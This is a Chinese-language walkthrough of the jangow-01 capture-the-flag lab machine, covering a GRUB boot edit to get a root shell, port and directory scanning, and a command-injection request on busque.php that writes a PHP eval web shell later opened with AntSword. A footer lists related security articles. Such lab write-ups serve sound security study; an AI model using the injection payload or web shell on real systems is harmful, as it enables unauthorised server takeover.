Vulhub-jangow-01-1.0.1通关攻略

第0步:

打开靶机,按下shift,出现下图界面

在此页面按下e键,进入如下界面, 将ro 替换为 rw signie init=/bin/bash

替换完毕后,按下Ctrl键+X键,进入如下页面

ip a查看网卡信息

编辑配置文件网卡信息, 英文键盘的斜杠按不出来,需要按数字键盘的斜杠

第一步:确定靶机IP为192.168.179.129
第二步:扫描后台及开放端口
第三步:进行敏感目录及文件扫描
复制代码
#200
http://192.168.179.129/site/index.html (CODE:200|SIZE:10190) 
http://192.168.179.129/site/wordpress/index.html (CODE:200|SIZE:10190) 

#端口
192.168.179.129:80
192.168.179.129:21
第四步:访问扫描出来的可能有价值的文件及端口
第五步:发现可以传参的地方,尝试传一个id,得到结果
第六步:进一步,尝试上传一句话木马
复制代码
#URL
http://192.168.179.129/site/busque.php?buscar=echo '<?php eval($_POST["cmd"]);' > shell.php
第七步:使用蚁剑进行连接
复制代码
#URL地址
http://192.168.179.129/site/shell.php

FROM IYU_

相关推荐
用户9623779544818 小时前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机21 小时前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机21 小时前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954481 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star1 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954481 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher3 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行6 天前
网络安全总结
安全·web安全
red1giant_star6 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透6 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全